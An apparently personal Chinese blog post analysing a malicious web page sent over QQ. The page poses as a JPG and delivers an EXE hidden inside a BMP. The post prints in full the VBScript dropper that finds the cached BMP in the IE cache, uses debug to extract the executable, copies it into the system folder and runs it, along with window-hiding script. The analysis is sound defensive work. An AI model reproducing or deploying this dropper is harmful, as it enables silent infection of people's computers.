某日,一QQ好友给我发信息,说正在看一幅画,还强调没病毒,我想把链接框起来,用网络快车下载下来看,没想到一下子点进去了,防火墙蹦出来,问要不要让mshta.exe访问网络,我知道中毒了,直接禁止他,然后用网络快车下载该jpg文件看,原来是html+javascript,找到如下可疑内容:
<img src="/images/girl.jpg" width="600" height="800">
显示jpg图像,让人以为此奶一MM图片
<IMG SRC=klook.bmp width=0 height=0>
<object data="klook.ASP" width=0 height=0>
klook.bmp和klook.ASP保证有问题
于是下载klook.bmp看,确实是bmp图,但都是乱七八糟的色块,于是用UltraEdit打开看,文件头是BMP没错,壳居然发现"MZ"和"PE"字样!我明白了,他把EXE文件粘贴再BMP文件头的后面!
再下载klook.asp,内容如下:
<title>-</title>
<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
sucess=0
SearchBMPFile fso.GetFolder(CACHE),"klook[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"klook[2].bmp"
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname');
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
Lt.WriteLine("2200")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("%40echo off")
Lt.WriteLine(chr(100) & "ebug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "klook.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "klook.exe")
Lt.WriteLine("del %0")
Lt.Close
sucess=1
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
window.close
</script>
<SCRIPT language=JavaScript>
parent.moveTo(0,0);
parent.resizeTo(0,0);
</SCRIPT>
大概是这样的:
先创建Scripting.FileSystemObject对象和WScript.Shell对象,读取IE临时文件所在地,然后搜索下载的klook.bmp文件,再把klook.bmp尾部附加的exe文件放出来执行。
下次把那个exe文件切下来反汇编一下